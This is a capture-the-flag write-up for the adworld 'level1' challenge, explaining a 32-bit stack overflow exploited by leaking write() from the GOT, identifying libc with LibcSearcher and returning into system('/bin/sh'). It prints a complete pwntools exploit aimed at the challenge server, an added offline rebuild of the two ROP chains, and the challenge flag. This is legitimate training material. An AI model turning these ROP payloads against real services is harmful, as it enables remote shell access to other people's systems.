CTF – XMan – level1 - LibcSearcher

Challenge description

Source: XMan

Challenge: level1

Tags: read() stack overflow, ROP, no libc provided, ret2libc, re-entering the vulnerable function

I already wrote up level1 on the Jarvisoj platform, which is a fairly simple exploit. This post is about the level1 on 攻防世界 (adworld); the program logic has changed a little.

Solution steps

The 攻防世界 level1 is identical to the Jarvisoj one in file type, security mechanisms and program structure,
but after connecting with nc it turns out the order of operations in the program is different.

The original vulnerable_function() looks like this:

But this is what the program returns when connecting with nc:

That is, read() runs first and printf() only afterwards, so the program prints nothing useful before the overflow happens.

That leaves the level3 approach: use the overflow to return into write() and leak a libc address, then re-enter the vulnerable function and ret2libc to system().

Write the exploit

from pwn import *
from LibcSearcher import *

p = remote('111.198.29.45', '39980')
e = ELF('./level1')

plt_write = e.plt['write']
got_write = e.got['write']
vule_addr = e.symbols['vulnerable_function']

# Stage 1: fill the 0x88-byte buffer and the saved ebp, then return into write@plt
# with the arguments write(1, got_write, 4) so the resolved address of write() is
# printed. write()'s own return address is vulnerable_function, so the program
# comes back for a second overflow instead of crashing.
payload1 = b'A'*0x88 + b'A'*0x4 + p32(plt_write) + p32(vule_addr) + p32(0x1) + p32(got_write) + p32(0x4)
p.send(payload1)

write_addr = u32(p.recv(4))
print("write addr - " + hex(write_addr))

# Identify the remote libc from the leaked write() address. LibcSearcher matches on
# the low 12 bits of the address, so several libcs may fit; if the shell does not
# spawn, rerun and choose the next candidate.
libc = LibcSearcher('write', write_addr)
write_off = libc.dump('write')
bin_sh_off = libc.dump('str_bin_sh')
system_off = libc.dump('system')
exit_off = libc.dump('exit')

libc_base = write_addr - write_off

system_addr = libc_base + system_off
bin_sh_addr = libc_base + bin_sh_off
exit_addr = libc_base + exit_off
print("system addr - " + hex(system_addr))
print("bin_sh addr - " + hex(bin_sh_addr))
print("exit addr - " + hex(exit_addr))

sleep(2)

# Stage 2: second overflow, this time returning into system("/bin/sh"), with exit()
# as system()'s return address so the process ends cleanly afterwards.
payload2 = b'A'*0x88 + b'A'*0x4 + p32(system_addr) + p32(exit_addr) + p32(bin_sh_addr)
p.send(payload2)

p.interactive()
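The two ROP chains in the exploit, rebuilt below as an added example so the stack layout can be inspected offline. This is not the original exploit and needs no pwntools or LibcSearcher: p32/u32 are reimplemented with struct, and the binary addresses and libc offsets are constructed sample values, not those of the challenge. The libc_base_from_leak check is the same test LibcSearcher's lookup relies on: the base of libc is page aligned, so a candidate offset whose low 12 bits differ from the leaked address cannot belong to the remote libc.

```python
"""Added example: 32-bit write()-leak ret2libc chain construction and libc base check.
All addresses and offsets here are constructed for illustration, not the challenge's."""
import struct

BUF_SIZE = 0x88   # size of buf in vulnerable_function (from the exploit above)
SAVED_EBP = 4     # saved ebp sits between buf and the return address on 32-bit x86


def p32(x):
    """Pack a 32-bit little-endian value (stand-in for pwntools p32)."""
    return struct.pack('<I', x & 0xffffffff)


def u32(data):
    """Unpack the first 4 bytes as a 32-bit little-endian value (stand-in for pwntools u32)."""
    return struct.unpack('<I', data[:4])[0]


def leak_chain(plt_write, got_write, vuln_addr, fd=1, length=4):
    """Stage 1: overwrite the return address with write@plt so that
    write(fd, got_write, length) prints the resolved address of write(),
    and make write() return into vulnerable_function for a second overflow."""
    return (b'A' * (BUF_SIZE + SAVED_EBP)
            + p32(plt_write)   # return address of vulnerable_function -> write@plt
            + p32(vuln_addr)   # return address of write() -> vulnerable_function
            + p32(fd)          # write() arg 1: stdout
            + p32(got_write)   # write() arg 2: address of write's GOT entry
            + p32(length))     # write() arg 3: 4 bytes, one 32-bit pointer


def shell_chain(system_addr, exit_addr, binsh_addr):
    """Stage 2: return into system("/bin/sh"), with exit() as system's return address."""
    return (b'A' * (BUF_SIZE + SAVED_EBP)
            + p32(system_addr)  # return address -> system
            + p32(exit_addr)    # return address of system() -> exit
            + p32(binsh_addr))  # system() arg 1: "/bin/sh" inside libc


def libc_base_from_leak(leaked, symbol_offset):
    """base = leaked - offset. libc is mapped page aligned, so a base that is not
    a multiple of 0x1000 means the candidate offset does not match the remote libc
    (this is the low-12-bit comparison a libc lookup is built on)."""
    base = leaked - symbol_offset
    if base & 0xfff:
        raise ValueError(f"offset {symbol_offset:#x} does not match leak {leaked:#x}: "
                         f"base {base:#x} is not page aligned")
    return base


def resolve(leaked_write, offsets):
    """Turn a leaked write() address plus a dict of libc offsets into absolute addresses."""
    base = libc_base_from_leak(leaked_write, offsets['write'])
    return {name: base + off for name, off in offsets.items()}


# Constructed sample values (assumptions for the demo, not the challenge binary/libc)
SAMPLE_BIN = {'plt_write': 0x08048320, 'got_write': 0x0804a018, 'vuln': 0x0804844b}
SAMPLE_OFFSETS = {'write': 0x000d43c0, 'system': 0x0003ada0,
                  'str_bin_sh': 0x0015ba0b, 'exit': 0x0002e9d0}


def demo(leak_bytes=b'\xc0\xa3\xe0\xf7'):
    """Run both stages on the constructed sample leak and return the chains and addresses."""
    stage1 = leak_chain(SAMPLE_BIN['plt_write'], SAMPLE_BIN['got_write'], SAMPLE_BIN['vuln'])
    leaked = u32(leak_bytes)            # what p.recv(4) would hand back
    addrs = resolve(leaked, SAMPLE_OFFSETS)
    stage2 = shell_chain(addrs['system'], addrs['exit'], addrs['str_bin_sh'])
    return stage1, addrs, stage2


if __name__ == '__main__':
    s1, addrs, s2 = demo()
    print(f"stage 1: {len(s1)} bytes, return address at offset {BUF_SIZE + SAVED_EBP:#x}")
    for name, addr in addrs.items():
        print(f"{name:>10} = {addr:#x}")
    print(f"stage 2: {len(s2)} bytes")
```

The page-alignment check only rejects offsets whose low 12 bits differ from the leak; several libc builds can share those bits, which is exactly why LibcSearcher may list more than one candidate. When that happens, the remaining candidates have to be tried one by one, as the usage note in the exploit says.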

Running it gives the flag.

flag:

cyberpeace{915f1367485a073a30946bf221a6af61}